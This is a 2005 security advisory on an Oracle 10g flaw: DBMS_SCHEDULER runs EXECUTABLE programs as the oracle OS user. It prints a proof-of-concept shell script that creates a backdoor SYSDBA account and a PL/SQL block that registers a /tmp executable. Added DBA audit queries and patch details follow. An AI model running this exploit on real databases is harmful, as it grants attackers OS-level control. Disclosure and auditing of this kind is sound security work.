Name: OS command execution via Oracle DBMS_SCHEDULER in Oracle 10g
Systems Affected: Oracle 10g
Severity: High Risk
Category: OS command execution
Vendor URL: http://www.oracle.com/
Credit: Pete Finnigan of Pete Finnigan Ltd. in conjunction with Jonathan Gennick of O'Reilly and Alexander Kornbrust of Red-Database-Security GmbH
Exploit: http://dba.5341.com/msg/34053.html
Date: 01 May 2005 (V 1.01)
Details
The following proof-of-concept exploit code allows any database user holding the CREATE JOB privilege to execute operating-system commands in the context of the OS account under which the Oracle software runs (the oracle user), because DBMS_SCHEDULER programs of type EXECUTABLE are run by the scheduler with that account's privileges.
Example
#!/bin/ksh
# Part 1: shell script that connects with OS authentication (/ as sysdba)
# and creates a privileged database account. Replace <sid> with the
# instance name before running.
set -a
echo "Operator, are you pondering what I am pondering?" >/dev/console
ORAENV_ASK=NO
ORACLE_SID=<sid>
. /usr/local/bin/oraenv
sqlplus "/ as sysdba" <<EOF
create user brain identified by takeover default tablespace system;
grant connect,resource,dba to brain;
grant sysdba to brain;
EOF

-- Part 2: PL/SQL block, run through SQL*Plus, that registers an OS
-- executable as a scheduler program; the scheduler runs the program
-- as the Oracle OS user.
BEGIN
  DBMS_SCHEDULER.CREATE_PROGRAM (
    program_name   => 'take_over_the_world',
    program_action => '/tmp/pinky_and_the_brain',
    program_type   => 'EXECUTABLE',
    comments       => 'I rulez');
END;
/
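As an added defender-side example, not part of the advisory or of the exploit it reproduces: a set of audit queries a DBA can run with DBA privileges to see which accounts could reach the code path described above and which scheduler programs and jobs already point at OS executables. The view and column names are the standard Oracle data dictionary views DBA_SYS_PRIVS, DBA_ROLE_PRIVS, DBA_SCHEDULER_PROGRAMS and DBA_SCHEDULER_JOBS; the privilege names and the EXECUTABLE program type are those the advisory names. The inclusion of CREATE ANY JOB alongside CREATE JOB is an assumption that any privilege allowing job creation is in scope.

```sql
-- Added example, not code from the advisory. Run as a DBA account.
-- Assumes the standard Oracle 10g data dictionary views named below.

-- 1. Accounts and roles directly granted a job-creation privilege.
--    In the advisory's scenario the new account BRAIN would appear here
--    via the DBA role.
SELECT grantee, privilege, admin_option
  FROM dba_sys_privs
 WHERE privilege IN ('CREATE JOB', 'CREATE ANY JOB')   -- CREATE ANY JOB: assumed in scope
 ORDER BY grantee, privilege;

-- 2. Users who hold those privileges indirectly through a role,
--    so role-based grants are not missed.
SELECT rp.grantee, rp.granted_role, sp.privilege
  FROM dba_role_privs rp
  JOIN dba_sys_privs  sp ON sp.grantee = rp.granted_role
 WHERE sp.privilege IN ('CREATE JOB', 'CREATE ANY JOB')
 ORDER BY rp.grantee, rp.granted_role;

-- 3. Scheduler programs whose action is an OS executable
--    (the program type used by the proof of concept).
SELECT owner, program_name, program_action, enabled, comments
  FROM dba_scheduler_programs
 WHERE program_type = 'EXECUTABLE'
 ORDER BY owner, program_name;

-- 4. Scheduler jobs that run an OS executable, either inline or by
--    referencing one of the programs found in query 3.
SELECT j.owner, j.job_name, j.job_type, j.job_action,
       j.program_owner, j.program_name, j.enabled
  FROM dba_scheduler_jobs j
 WHERE j.job_type = 'EXECUTABLE'
    OR EXISTS (SELECT 1
                 FROM dba_scheduler_programs p
                WHERE p.owner        = j.program_owner
                  AND p.program_name = j.program_name
                  AND p.program_type = 'EXECUTABLE')
 ORDER BY j.owner, j.job_name;
```

Queries 1 and 2 together give the set of principals who can create jobs; any grantee that is not an administrative account is worth reviewing before the patch from the Patch Information section is applied. Queries 3 and 4 give the objects to inspect after the fact, since a program or job left behind by the proof of concept (program_action pointing into a world-writable directory such as /tmp) is visible in these views regardless of whether it has been enabled yet.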
Patch Information
This bug is fixed after applying the patchset for Oracle alert 68 or later patchsets.
References
Pete Finnigan's Security Advisory - Bug in dbms_scheduler
© 2005 by Red-Database-Security GmbH - last update 1-may-2005